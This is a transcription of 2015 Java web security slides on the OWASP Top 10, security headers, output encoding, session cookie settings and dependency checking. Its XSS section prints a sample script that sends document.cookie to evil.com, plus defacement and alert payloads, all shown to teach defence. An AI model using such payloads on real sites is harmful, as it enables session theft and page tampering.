Sichere Webanwendungen mit Java

Similar documents
Sicherheit beim Build

Sichere Software vom Java-Entwickler

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Welcome to the OWASP TOP 10

Web Application Security. Philippe Bogaerts

Aguascalientes Local Chapter. Kickoff

OWASP Review. Amherst Security Group June 14, 2017 Robert Hurlbut.

CIS 4360 Secure Computer Systems XSS

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

WEB SECURITY: XSS & CSRF

Exploiting and Defending: Common Web Application Vulnerabilities

OWASP Top 10 The Ten Most Critical Web Application Security Risks

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

W3Conf, November 15 & 16, Brad Scott

Web Application Security

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Tabular Presentation of the Application Software Extended Package for Web Browsers

Application Layer Security

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

HTTP Security Headers Explained

OWASP Top David Caissy OWASP Los Angeles Chapter July 2017

Using and Customizing Microsoft Threat Modeling Tool 2016

Your Turn to Hack the OWASP Top 10!

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Solutions Business Manager Web Application Security Assessment

Client Side Injection on Web Applications

Web Application Threats and Remediation. Terry Labach, IST Security Team

Web basics: HTTP cookies

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Content Security Policy

CSCE 813 Internet Security Case Study II: XSS

Application. Security. on line training. Academy. by Appsec Labs

Copyright

OWASP Top 10. from a developer s perspective. John Wilander, OWASP/Omegapoint, IBWAS 10

Applications Security

EasyCrypt passes an independent security audit

COMP9321 Web Application Engineering

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Web Application Vulnerabilities: OWASP Top 10 Revisited

RKN 2015 Application Layer Short Summary

PRESENTED BY:

eb Security Software Studio

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Web Security. Web Programming.

CSC 482/582: Computer Security. Cross-Site Security

High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018

OWASP TOP 10. By: Ilia

CS 155 Project 2. Overview & Part A

CS 161 Computer Security

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Web security: an introduction to attack techniques and defense methods

C1: Define Security Requirements

SECURITY TESTING. Towards a safer web world

Web Application Security GVSAGE Theater

EIN. Java Forum Stuttgart Dominik Schadow bridgingit

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s


Requirements from the Application Software Extended Package for Web Browsers

JAMES BENNETT DJANGOCON EUROPE 3RD JUNE 2015 THE NET IS DARK AND FULL OF TERRORS

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

Chrome Extension Security Architecture

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Defend Your Web Applications Against the OWASP Top 10 Security Risks. Speaker Name, Job Title

NoScript, CSP and ABE: When The Browser Is Not Your Enemy

Evaluating the Security Risks of Static vs. Dynamic Websites

1 About Web Security. What is application security? So what can happen? see [?]

Preparing for the Cross Site Request Forgery Defense

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

Information Security. Gabriel Lawrence Director, IT Security UCSD

Clojure Web Security. FrOSCon Joy Clark & Simon Kölsch

Client Side Security And Testing Tools

Web Application Penetration Testing

V Conference on Application Security and Modern Technologies

Top 10 Web Application Vulnerabilities

Large Scale Generation of Complex and Faulty PHP Test Cases

Certified Secure Web Application Engineer

Vulnerabilities in web applications

Web Applications Penetration Testing

Web Attacks CMSC 414. September 25 & 27, 2017

Robust Defenses for Cross-Site Request Forgery

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

"Charting the Course to Your Success!" Securing.Net Web Applications Lifecycle Course Summary

Integrity attacks (from data to code): Cross-site Scripting - XSS

GOING WHERE NO WAFS HAVE GONE BEFORE

Development Security Guide Oracle Banking Virtual Account Management Release July 2018

Biting the Hand that Feeds You

Web Security. Thierry Sans

Application vulnerabilities and defences

Web Security: Vulnerabilities & Attacks

CSCD 303 Essential Computer Security Fall 2018

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

CSCD 303 Essential Computer Security Fall 2017

Transcription:

Sichere Webanwendungen mit Java Karlsruher IT- Sicherheitsinitiative 16.07.2015 Dominik Schadow bridgingit

Patch fast Unsafe platform unsafe web application

Now lets have a look at the developers

OWASP TOP 10 2013 (1) Injection (2) Broken Authentication and Session Management (3) Cross-Site Scripting (XSS) (4) Insecure Direct Object References (5) Security Misconfiguration (6) Sensitive Data Exposure (7) Missing Function Level Access Control (8) Cross-Site Request Forgery (CSRF) (9) Using Components with Known Vulnerabilities (10) Unvalidated Redirects and Forwards

What scares others does not necessarily scare you!

OWASP TOP 10 Proactive Controls (1) Parameterize Queries (2) Encode Data (3) Validate All Inputs (4) Implement Appropriate Access Controls (5) Establish Identity and Authentication Controls (6) Protect Data and Privacy (7) Implement Logging, Error Handling and Intrusion Detection (8) Leverage Security Features of Frameworks and Security Libraries (9) Include Security-Specific Requirements (10) Design and Architect Security in

Secure Programming Design and Architect Security in

Presentation Security Services Domain Data Access

Applications need to be secure by design Threat model

Threat modeling key questions* 1. What are you building? 2. What can go wrong? 3. What should you do about those things that can go wrong? 4. Did you do a decent job of analysis in steps 1 to 3? * by Adam Shostack - Threat Modeling

Secure all data during transport

Log-in form requires HTTPS Link to a dedicated HTTPS log-in page HSTS to force HTTPS for whole page

@WebFilter(urlPatterns = {"/*"}) public class HSTS implements Filter { public void dofilter( ) { HttpServletResponse response = (HttpServletResponse) res; response.addheader( "Strict-Transport-Security", "max-age=31556926"); chain.dofilter(req, response); } // }

Combine security response headers HTTP Strict Transport Security (HSTS) Forces HTTPS connections Cache-Control Prevents storing sensitive data in browser cache X-Content-Type-Options Prevents drive-by downloads X-Frame-Options Prevents UI redressing attacks (clickjacking) Content Security Policy (CSP) Prevents Cross-Site Scripting

response.addheader( "Content-Security-Policy", "default-src 'none'; script-src *.sample.com; style-src sample.org; frame-ancestors 'none'" );

Defense in depth

Verify all headers in the browser

Recx Security Analyser

Cross-Site Scripting

XSS attacks Execute arbitrary code in browser Access victim s session credentials Website defacement Load remotely hosted scripts Redirects to phishing/ malware sites Data theft Undermine CSRF defense

Session Theft <script> var img = new Image(); img.src = "http://evil.com?" + document.cookie; </script>

Website Defacement <script> document.body.innerhtml("xss"); </script>

<

<

In which context will the (user) input be used? <script>alert("xss")</script> HTML <script>alert("xss")& lt;/script> CSS \3cscript\3e alert(\22xss\22)\3c \2fscript\3e JavaScript <script>alert(\x22xss\x22)<\/script>

OWASP Java Encoder String enchtml = Encode.forHtml(name); String enccss = Encode.forCssString(name); String encjs = Encode.forJavaScript(name);

<web-app... version="3.1"> <session-config> <!-- idle timeout after session expires --> <session-timeout>30</session-timeout> <cookie-config> <!-- prevent session id script access --> <http-only>true</http-only> <!-- transfer cookie via https only --> <secure>true</secure> </cookie-config> <!-- session id in cookie, not URL --> <tracking-mode>cookie</tracking-mode> </session-config> </web-app>

Hack yourself first

Hack yourself first Professional pentester

Frameworks and libraries decline

My code, my configuration And whose libs?

<reporting> <plugins><plugin> <groupid>org.owasp</groupid> <artifactid> dependency-check-maven </artifactid> <version>1.2.11</version> <reportsets><reportset> <reports> <report>aggregate</report> </reports> </reportset></reportsets> </plugin></plugins> </reporting>

Threat model Use OWASP Top 10 Proactive Controls as a guide and hack yourself first Keep your libraries (and everything else) up-to-date

BridgingIT GmbH Königstraße 42 70173 Stuttgart dominik.schadow@bridging-it.de www.bridging-it.de Blog blog.dominikschadow.de Twitter @dschadow Demo Projects github.com/dschadow/javasecurity Microsoft Threat Modeling Tool www.microsoft.com/en-us/sdl/adopt/ threatmodeling.aspx Mozilla SeaSponge air.mozilla.org/mozilla-winter-of-securityseasponge-a-tool-for-easy-threatmodeling OWASP Dependency Check www.owasp.org/index.php/ OWASP_Dependency_Check OWASP Java Encoder www.owasp.org/index.php/ OWASP_Java_Encoder_Project OWASP Top 10 2013 www.owasp.org/index.php/ Category:OWASP_Top_Ten_Project OWASP Top 10 Proactive Controls www.owasp.org/index.php/ OWASP_Proactive_Controls Recx Security Analyser www.recx.co.uk/products/ chromeplugin.php Pictures www.dreamstime.com

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback